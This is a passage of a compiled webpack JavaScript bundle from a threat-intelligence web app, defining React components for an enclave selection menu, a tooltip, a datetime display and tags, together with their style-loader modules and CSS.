	"orange": "EnclaveIcon__orange__27SZ7O",
	"gold": "EnclaveIcon__gold__3lu9d2",
	"pink": "EnclaveIcon__pink__1ST477",
	"green": "EnclaveIcon__green__2dYeCv",
	"light-purple": "EnclaveIcon__light-purple__3uwl8k",
	"dark-green": "EnclaveIcon__dark-green__1qbOOy",
	"purple": "EnclaveIcon__purple__UT1QbQ",
	"teal": "EnclaveIcon__teal__kIBwQL",
	"focus-blue": "EnclaveIcon__focus-blue__1BpsU6",
	"dark-brown": "EnclaveIcon__dark-brown__1BOk5B",
	"gray": "EnclaveIcon__gray__3sTmhj"
};

/***/ }),
/* 3639 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return EnclaveMenu; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_react_dom__ = __webpack_require__(65);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_react_dom___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_react_dom__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__EnclaveIcon_js__ = __webpack_require__(910);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_classnames_bind__ = __webpack_require__(39);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_classnames_bind___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4_classnames_bind__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__EnclaveMenu_styl__ = __webpack_require__(3640);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__EnclaveMenu_styl___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_5__EnclaveMenu_styl__);
var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }


// $FlowIssue: this will be resolved when we upgrade flow. React defs are out of date








var cx = __WEBPACK_IMPORTED_MODULE_4_classnames_bind___default.a.bind(__WEBPACK_IMPORTED_MODULE_5__EnclaveMenu_styl___default.a);

var stopPropagation = function stopPropagation(e) {
  return e.stopPropagation();
};

var EnclaveMenu = function (_React$Component) {
  _inherits(EnclaveMenu, _React$Component);

  function EnclaveMenu() {
    _classCallCheck(this, EnclaveMenu);

    return _possibleConstructorReturn(this, (EnclaveMenu.__proto__ || Object.getPrototypeOf(EnclaveMenu)).apply(this, arguments));
  }

  _createClass(EnclaveMenu, [{
    key: 'render',
    value: function render() {
      var _props = this.props,
          position = _props.position,
          className = _props.className,
          showDefault = _props.showDefault,
          enclavesMap = _props.enclavesMap,
          selectEnclave = _props.selectEnclave,
          allowAnyOption = _props.allowAnyOption,
          setEnclaveMenu = _props.setEnclaveMenu,
          enclaveSelection = _props.enclaveSelection,
          onClickOutside = _props.onClickOutside;

      return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
        'div',
        {
          className: cx('enclaveDropdown', className),
          style: position ? position : {} },
        onClickOutside && Object(__WEBPACK_IMPORTED_MODULE_1_react_dom__["createPortal"])(__WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('div', { className: cx('backdrop'), onClick: onClickOutside }), document.querySelector('#portalTarget')),
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
          'div',
          { onClick: stopPropagation, className: cx('inner') },
          __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
            'div',
            { className: cx('menuTitle') },
            this.props.title
          ),
          enclavesMap.toList().sort(__WEBPACK_IMPORTED_MODULE_2_trustar_utils__["alphabetize"]).map(function (enclave) {
            var current = enclaveSelection.get('enclaveId') === enclave.get('id');
            return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
              'div',
              {
                key: enclave.get('id'),
                onClick: function onClick() {
                  return (allowAnyOption || !current) && selectEnclave(enclave.get('name'), enclave.get('id'));
                },
                className: cx('menuOption', { current: current }) },
              __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_3__EnclaveIcon_js__["b" /* EnclaveIcon */], { className: cx('EnclaveIcon'), enclave: enclave }),
              __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
                'div',
                { className: cx('name') },
                enclave.get('name')
              ),
              current && __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
                'span',
                { className: cx('checked') },
                __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('i', { className: 'fa fa-check' })
              )
            );
          }),
          showDefault && __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
            'div',
            {
              className: cx('menuOption', 'configureOption'),
              onClick: function onClick() {
                return setEnclaveMenu(true);
              } /* What's going on here? Why do this? */ },
            __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('i', { className: cx('fa fa-gear') }),
            'Configure Default Enclave'
          )
        )
      );
    }
  }]);

  return EnclaveMenu;
}(__WEBPACK_IMPORTED_MODULE_0_react__["Component"]);
EnclaveMenu.defaultProps = {
  showDefault: true,
  title: 'Change Enclave Selection'
};

/***/ }),
/* 3640 */
/***/ (function(module, exports, __webpack_require__) {

// style-loader: Adds some css to the DOM by adding a <style> tag

// load the styles
var content = __webpack_require__(3641);
if(typeof content === 'string') content = [[module.i, content, '']];
// Prepare cssTransformation
var transform;

var options = {"hmr":true}
options.transform = transform
// add the styles to the DOM
var update = __webpack_require__(28)(content, options);
if(content.locals) module.exports = content.locals;
// Hot Module Replacement
if(false) {
	// When the styles change, update the <style> tags
	if(!content.locals) {
		module.hot.accept("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./EnclaveMenu.styl", function() {
			var newContent = require("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./EnclaveMenu.styl");
			if(typeof newContent === 'string') newContent = [[module.id, newContent, '']];
			update(newContent);
		});
	}
	// When the module is disposed, remove the <style> tags
	module.hot.dispose(function() { update(); });
}

/***/ }),
/* 3641 */
/***/ (function(module, exports, __webpack_require__) {

exports = module.exports = __webpack_require__(27)(undefined);
// imports


// module
exports.push([module.i, ".EnclaveMenu__enclaveDropdown__3-WP7O {\n  position: absolute;\n  z-index: 50;\n  width: 350px;\n  bottom: 15px;\n  text-align: left;\n  max-height: 400px;\n  overflow-y: scroll;\n  color: #4a4a4a;\n  border: 1px solid #cacaca;\n  background-color: #f7f7f8;\n  box-shadow: 0 0 70px rgba(0,2,10,0.15);\n}\n.EnclaveMenu__menuOption__1oruzD {\n  padding: 12px;\n  display: flex;\n  align-items: center;\n}\n.EnclaveMenu__menuOption__1oruzD:hover {\n  background: #e6e6e6;\n  cursor: pointer;\n}\n.EnclaveMenu__menuOption__1oruzD i {\n  margin: auto 5px;\n}\n.EnclaveMenu__menuOption__1oruzD .EnclaveMenu__checked__3D2nGr i {\n  color: #528bff;\n}\n.EnclaveMenu__EnclaveIcon__1AxlhY {\n  width: 20px;\n  height: 20px;\n}\n.EnclaveMenu__name__fRTScC {\n  flex: 1 100%;\n  padding-left: 5px;\n}\n.EnclaveMenu__menuTitle__1dscdJ {\n  padding: 8px 12px;\n  border-bottom: 1px solid #cacaca;\n  background: #fff;\n}\n.dark .EnclaveMenu__menuTitle__1dscdJ {\n  border-bottom: 1px solid #304866;\n  background: #1a1c20;\n}\n.dark .EnclaveMenu__dateLabel__1Idgd2 {\n  color: #fff;\n}\n.dark .EnclaveMenu__enclaveDropdown__3-WP7O {\n  color: #fff;\n  border: 1px solid #626262;\n  background: #221f20;\n  background: #221f20;\n}\n.dark .EnclaveMenu__menuTitle__1dscdJ {\n  border-bottom: 1px solid rgba(29,57,89,0.46);\n}\n.dark .EnclaveMenu__menuOption__1oruzD .EnclaveMenu__checked__3D2nGr {\n  color: #528bff;\n}\n.dark .EnclaveMenu__menuOption__1oruzD:hover {\n  background: #3e383a;\n}\n.dark .EnclaveMenu__configureOption__11rzlB {\n  color: #aaa;\n  background: #393436;\n}\n.dark .EnclaveMenu__configureOption__11rzlB i {\n  color: #aaa;\n}\n.dark .EnclaveMenu__configureOption__11rzlB:hover {\n  color: #528bff;\n}\n.EnclaveMenu__backdrop__jMKWdj {\n  z-index: 49;\n  position: fixed;\n  top: 0;\n  left: 0;\n  right: 0;\n  bottom: 0;\n  background: transparent;\n}\n", ""]);

// exports
exports.locals = {
	"enclaveDropdown": "EnclaveMenu__enclaveDropdown__3-WP7O",
	"menuOption": "EnclaveMenu__menuOption__1oruzD",
	"checked": "EnclaveMenu__checked__3D2nGr",
	"EnclaveIcon": "EnclaveMenu__EnclaveIcon__1AxlhY",
	"name": "EnclaveMenu__name__fRTScC",
	"menuTitle": "EnclaveMenu__menuTitle__1dscdJ",
	"dateLabel": "EnclaveMenu__dateLabel__1Idgd2",
	"configureOption": "EnclaveMenu__configureOption__11rzlB",
	"backdrop": "EnclaveMenu__backdrop__jMKWdj"
};

/***/ }),
/* 3642 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return Tip; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_classnames_bind__ = __webpack_require__(39);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_classnames_bind___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_classnames_bind__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_react_dom__ = __webpack_require__(65);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_react_dom___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_react_dom__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_trustar_dom_utils__ = __webpack_require__(1479);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__Tip_styl__ = __webpack_require__(3643);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__Tip_styl___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_5__Tip_styl__);
var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }








var cx = __WEBPACK_IMPORTED_MODULE_1_classnames_bind___default.a.bind(__WEBPACK_IMPORTED_MODULE_5__Tip_styl___default.a);

var open = function open() {
  return { isOpen: true };
};
var close = function close() {
  return { isOpen: false };
};

/**
 * A simpler tooltip.
 */
var Tip = function (_React$Component) {
  _inherits(Tip, _React$Component);

  function Tip() {
    var _ref;

    var _temp, _this, _ret;

    _classCallCheck(this, Tip);

    for (var _len = arguments.length, args = Array(_len), _key = 0; _key < _len; _key++) {
      args[_key] = arguments[_key];
    }

    return _ret = (_temp = (_this = _possibleConstructorReturn(this, (_ref = Tip.__proto__ || Object.getPrototypeOf(Tip)).call.apply(_ref, [this].concat(args))), _this), _this.state = {
      isOpen: false,
      position: {
        top: 0,
        left: 0
      }
    }, _this.updatePosition = function () {
      try {
        var dom = Object(__WEBPACK_IMPORTED_MODULE_2_react_dom__["findDOMNode"])(_this.el);
        // $FlowIgnore: This is what the try-catch is for
        var rect = dom.getBoundingClientRect();
        return {
          top: rect.top - 10, // Adjust top for tooltip on top
          left: rect.left + rect.width / 2 // Adjust left for tooltip centered
        };
      } catch (err) {
        // Not much to be done here. We should not hit this. Without the dom
        // measurement we can't position the tooltip properly
        return null;
      }
    }, _this.onMouseOver = function (e) {
      var position = _this.updatePosition();

      // Only open the tooltip if the position can be calculated
      if (position) {
        _this.setState(Object(__WEBPACK_IMPORTED_MODULE_4_trustar_utils__["mergeState"])(open, function () {
          return { position: position };
        }));
      }
    }, _this.onMouseOut = function (e) {
      _this.setState(close);
    }, _temp), _possibleConstructorReturn(_this, _ret);
  }

  _createClass(Tip, [{
    key: 'render',
    value: function render() {
      var _this2 = this;

      var isOpen = this.state.isOpen;
      var _props = this.props,
          className = _props.className,
          tooltipClassName = _props.tooltipClassName;


      return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
        'div',
        { className: cx('Tip', className) },
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
          'div',
          {
            ref: function ref(el) {
              _this2.el = el;
            },
            onMouseOver: this.onMouseOver,
            onMouseOut: this.onMouseOut,
            className: cx('children') },
          this.props.children
        ),
        Object(__WEBPACK_IMPORTED_MODULE_3_trustar_dom_utils__["a" /* renderPortal */])(__WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
          'div',
          {
            style: this.state.position,
            className: cx('text', { isOpen: isOpen }, tooltipClassName) },
          this.props.text
        ))
      );
    }
  }]);

  return Tip;
}(__WEBPACK_IMPORTED_MODULE_0_react__["Component"]);

/***/ }),
/* 3643 */
/***/ (function(module, exports, __webpack_require__) {

// style-loader: Adds some css to the DOM by adding a <style> tag

// load the styles
var content = __webpack_require__(3644);
if(typeof content === 'string') content = [[module.i, content, '']];
// Prepare cssTransformation
var transform;

var options = {"hmr":true}
options.transform = transform
// add the styles to the DOM
var update = __webpack_require__(28)(content, options);
if(content.locals) module.exports = content.locals;
// Hot Module Replacement
if(false) {
	// When the styles change, update the <style> tags
	if(!content.locals) {
		module.hot.accept("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./Tip.styl", function() {
			var newContent = require("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./Tip.styl");
			if(typeof newContent === 'string') newContent = [[module.id, newContent, '']];
			update(newContent);
		});
	}
	// When the module is disposed, remove the <style> tags
	module.hot.dispose(function() { update(); });
}

/***/ }),
/* 3644 */
/***/ (function(module, exports, __webpack_require__) {

exports = module.exports = __webpack_require__(27)(undefined);
// imports


// module
exports.push([module.i, ".Tip__Tip__1fLG9m {\n  position: relative;\n  display: table;\n}\n.Tip__text__19m_XZ {\n  position: fixed;\n  z-index: 2;\n  -webkit-transform: translate(-50%, -30px);\n          transform: translate(-50%, -30px);\n  display: block;\n  padding: 2px 4px;\n  color: #4a4a4a;\n  background: #fff;\n  border-radius: 3px;\n  pointer-events: none;\n  opacity: 0;\n}\n.Tip__text__19m_XZ:after {\n  content: '';\n  position: absolute;\n  top: 100%;\n  left: 50%;\n  border: 8px solid transparent;\n  border-top-color: #fff;\n  -webkit-transform: translateX(-50%);\n          transform: translateX(-50%);\n}\n.Tip__text__19m_XZ.Tip__isOpen__cuf-73 {\n  opacity: 1;\n  pointer-events: all;\n}\n", ""]);

// exports
exports.locals = {
	"Tip": "Tip__Tip__1fLG9m",
	"text": "Tip__text__19m_XZ",
	"isOpen": "Tip__isOpen__cuf-73"
};

/***/ }),
/* 3645 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return LocalDatetime; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_moment_timezone__ = __webpack_require__(214);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_moment_timezone___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_moment_timezone__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_react_redux__ = __webpack_require__(24);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_modules_settings_getters_js__ = __webpack_require__(777);





// Calling code is welcome to override this as needed.
var defaultFormat = 'YYYY-MM-DD h:ma z';

var mapState = function mapState(state) {
  return {
    timezone: Object(__WEBPACK_IMPORTED_MODULE_2_modules_settings_getters_js__["timezone"])(state)
  };
};
var LocalDatetime = Object(__WEBPACK_IMPORTED_MODULE_1_react_redux__["connect"])(mapState)(function (_ref) {
  var timezone = _ref.timezone,
      timestamp = _ref.timestamp,
      _ref$format = _ref.format,
      format = _ref$format === undefined ? defaultFormat : _ref$format;

  return __WEBPACK_IMPORTED_MODULE_0_moment_timezone___default()(timestamp).tz(timezone).format(format);
});

/***/ }),
/* 3646 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export Tag */
/* unused harmony export RemovableTag */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_classnames_bind__ = __webpack_require__(39);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_classnames_bind___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_classnames_bind__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__Tags_styl__ = __webpack_require__(3647);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__Tags_styl___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2__Tags_styl__);
var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }

/*
    Generic tags to be used how you feel (in forms, searches, wherever)
 */





var cx = __WEBPACK_IMPORTED_MODULE_1_classnames_bind___default.a.bind(__WEBPACK_IMPORTED_MODULE_2__Tags_styl___default.a);

/*
  A simple tag, displays a string, does not have a remove button
 */

var Tag = function (_React$Component) {
  _inherits(Tag, _React$Component);

  function Tag() {
    _classCallCheck(this, Tag);

    return _possibleConstructorReturn(this, (Tag.__proto__ || Object.getPrototypeOf(Tag)).apply(this, arguments));
  }

  _createClass(Tag, [{
    key: 'render',
    value: function render() {
      var tagLabel = this.props.tagLabel;

      // TODO:REFACTOR

      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        'div',
        { className: cx('tag') },
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          'span',
          { className: cx('tag-label') },
          tagLabel
        )
      );
    }
  }]);

  return Tag;
}(__WEBPACK_IMPORTED_MODULE_0_react___default.a.Component);

/*
  A tag with an X icon on the left that allows remove funcionality to be provided by whomever uses it
 */

var RemovableTag = function (_React$Component2) {
  _inherits(RemovableTag, _React$Component2);

  function RemovableTag() {
    _classCallCheck(this, RemovableTag);

    return _possibleConstructorReturn(this, (RemovableTag.__proto__ || Object.getPrototypeOf(RemovableTag)).apply(this, arguments));
  }

  _createClass(RemovableTag, [{
    key: 'render',
    value: function render() {
      var _props = this.props,
          tagLabel = _props.tagLabel,
          onRemove = _props.onRemove;


      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        'div',
        { className: cx('removable-tag') },
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          'span',
          { className: cx('close-btn'), onClick: onRemove },
          '\xD7'
        ),
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          'span',
          { className: cx('tag-label') },
          tagLabel
        )
      );
    }
  }]);

  return RemovableTag;
}(__WEBPACK_IMPORTED_MODULE_0_react___default.a.Component);

/***/ }),
/* 3647 */
/***/ (function(module, exports, __webpack_require__) {

// style-loader: Adds some css to the DOM by adding a <style> tag

// load the styles
var content = __webpack_require__(3648);
if(typeof content === 'string') content = [[module.i, content, '']];
// Prepare cssTransformation
var transform;

var options = {"hmr":true}
options.transform = transform
// add the styles to the DOM
var update = __webpack_require__(28)(content, options);
if(content.locals) module.exports = content.locals;
// Hot Module Replacement
if(false) {
	// When the styles change, update the <style> tags
	if(!content.locals) {
		module.hot.accept("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./Tags.styl", function() {
			var newContent = require("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./Tags.styl");
			if(typeof newContent === 'string') newContent = [[module.id, newContent, '']];
			update(newContent);
		});
	}
	// When the module is disposed, remove the <style> tags
	module.hot.dispose(function() { update(); });
}

/***/ }),
/* 3648 */
/***/ (function(module, exports, __webpack_require__) {

exports = module.exports = __webpack_require__(27)(undefined);
// imports


// module
exports.push([module.i, ".Tags__tag__3i1eMD {\n  display: inline-flex;\n  align-items: center;\n  min-width: 51px;\n  max-width: 100px;\n  height: 24px;\n  border: 1px solid #aaa;\n  border-radius: 3px;\n  font-size: 12px;\n  margin-right: 5px;\n  margin-bottom: 5px;\n}\n.Tags__removable-tag__3FmwZc {\n  display: inline-flex;\n  align-items: center;\n  min-width: 51px;\n  max-width: 100px;\n  height: 24px;\n  border: 1px solid #aaa;\n  border-radius: 3px;\n  font-size: 12px;\n  margin-right: 5px;\n  margin-bottom: 5px;\n}\n.Tags__removable-tag__3FmwZc:hover {\n  background-color: #ebebeb;\n}\n.Tags__removable-tag__3FmwZc .Tags__tag-label__3CHCGj {\n  display: inline-flex;\n  justify-content: center;\n  align-items: center;\n  min-width: 50px;\n  pointer-events: none;\n  overflow: hidden;\n}\n.Tags__removable-tag__3FmwZc .Tags__close-btn__3iXyZY {\n  font-size: 18px;\n  text-align: center;\n  cursor: pointer;\n  color: #aaa;\n  width: 22px;\n  height: 24px;\n  border-right: 1px solid #aaa;\n}\n.Tags__removable-tag__3FmwZc .Tags__close-btn__3iXyZY:hover {\n  color: #777676;\n}\n", ""]);

// exports
exports.locals = {
	"tag": "Tags__tag__3i1eMD",
	"removable-tag": "Tags__removable-tag__3FmwZc",
	"tag-label": "Tags__tag-label__3CHCGj",
	"close-btn": "Tags__close-btn__3iXyZY"
};

/***/ }),
/* 3649 */
/***/ (function(module, exports, __webpack_require__) {

// style-loader: Adds some css to the DOM by adding a <style> tag

// load the styles
var content = __webpack_require__(3650);
if(typeof content === 'string') content = [[module.i, content, '']];
// Prepare cssTransformation
var transform;

var options = {"hmr":true}
options.transform = transform
// add the styles to the DOM
var update = __webpack_require__(28)(content, options);
if(content.locals) module.exports = content.locals;
// Hot Module Replacement
if(false) {
	// When the styles change, update the <style> tags
	if(!content.locals) {
		module.hot.accept("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./App.styl", function() {
			var newContent = require("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./App.styl");
			if(typeof newContent === 'string') newContent = [[module.id, newContent, '']];
			update(newContent);
		});
	}
	// When the module is disposed, remove the <style> tags
	module.hot.dispose(function() { update(); });
}

/***/ }),
/* 3650 */
/***/ (function(module, exports, __webpack_require__) {

exports = module.exports = __webpack_require__(27)(undefined);
// imports


// module
exports.push([module.i, "* {\n  box-sizing: border-box;\n}\nhtml {\n  font-size: 12px;\n}\nbody {\n  height: 100%;\n}\n#root {\n  height: 100%;\n}\nhtml {\n  min-height: 100%;\n}\nbody {\n  color: #4a4a4a;\n  font-family: 'SplunkDataSans', 'Helvetica Neue', Helvetica, Arial, sans-serif;\n  font-size: 14px false;\n  text-rendering: optimizeLegibility;\n}\na {\n  color: #4a4a4a;\n}\npre {\n  font-family: 'SplunkDataSans', 'Liberation Mono', Menlo, Courier, monospace;\n  line-height: 1.5;\n  border-radius: 3px;\n  border: 1px solid #979797;\n}\nh1,\nh2,\nh3 {\n  line-height: 1.3;\n  font-family: 'SplunkDataSans', 'Helvetica Neue', Helvetica, Arial, sans-serif;\n}\nh4,\nh5,\nh6,\np {\n  line-height: 1.5;\n}\nstrong {\n  font-weight: bold;\n}\nh1 {\n  font-size: 48px;\n}\nh2 {\n  font-size: 36px;\n}\nh3 {\n  font-size: 24px;\n}\nh4 {\n  font-size: 20px;\n}\nh5,\nh6 {\n  font-size: 18px;\n}\nbutton,\ninput,\ntextarea {\n  padding: 7px 9px;\n  display: block;\n  outline: none;\n  border: 1px solid #d7dae0;\n  border-radius: 3px;\n  font-size: 14px;\n  line-height: 20px;\n  -webkit-appearance: none;\n     -moz-appearance: none;\n          appearance: none;\n}\ninput[type=radio] {\n  -webkit-appearance: radio;\n     -moz-appearance: radio;\n          appearance: radio;\n}\ntextarea {\n  resize: vertical;\n}\ninput:focus,\ntextarea:focus {\n  border-color: #528bff;\n}\ninput[type=checkbox] {\n  -webkit-appearance: checkbox;\n     -moz-appearance: checkbox;\n          appearance: checkbox;\n  display: inline-block;\n  padding: 0;\n}\ninput[disabled] {\n  -webkit-user-select: none;\n     -moz-user-select: none;\n      -ms-user-select: none;\n          user-select: none;\n  pointer-events: none;\n  cursor: not-allowed;\n  color: #9c9c9c;\n  background: #e0e0e4;\n  border: 1px solid #bbbbc2;\n  cursor: not-allowed;\n}\nbutton {\n  border-color: transparent;\n}\ncode,\npre {\n  font-family: 'SplunkDataSans', 'Liberation Mono', Menlo, Courier, monospace;\n}\na {\n  color: #245da7;\n  cursor: pointer;\n}\nnav a,\nnav button {\n  cursor: default;\n}\n.App__contentArea__1yI8H2,\n.App__Nav__3c3-14,\n.App__routeHandler__ohLQL7,\n.App__Footer__2jKa2q {\n  display: block;\n}\n.App__SuperSpinner__tJ_Trz {\n  position: fixed;\n  top: 0;\n  bottom: 0;\n  left: 0;\n  right: 0;\n  background: #fff;\n  display: flex;\n  justify-content: center;\n  padding-top: 175px;\n}\n.App__App__3Kc-A5 {\n  background: #fff;\n  display: flex;\n  flex-direction: column;\n  height: 100%;\n  min-width: 1020px;\n}\n.App__orangeButton__1QEhr5 {\n  background: linear-gradient(to bottom, #ffc384, #ff833c);\n  border: 1px solid #ff8c49;\n  color: #fff;\n}\n.App__orangeButton__1QEhr5:hover {\n  background: linear-gradient(to bottom, #ffba71, #ff792c);\n}\n.App__redButton__DLcXCG {\n  background: linear-gradient(to bottom, #e44921, #e96846);\n  border: 1px solid #d13f19;\n  color: #fff;\n  font-weight: bold;\n}\n.App__redButton__DLcXCG:hover {\n  background: linear-gradient(to bottom, #d13f19, #e6542d);\n}\n.App__blueButton__3nIch4 {\n  border: 1px solid #3d7efb;\n  background: linear-gradient(to bottom, #50a0fb, #2875fb);\n  color: #fff;\n  text-shadow: 0 -1px 0 rgba(0,0,0,0.15);\n  background-color: #eebd31;\n  font-weight: bold;\n  padding: 6px;\n  text-align: center;\n  padding: 7px 9px;\n  border-radius: 3px;\n  text-decoration: none;\n  display: inline-block;\n}\n.App__blueButton__3nIch4:hover {\n  background: linear-gradient(to bottom, #4097fb, 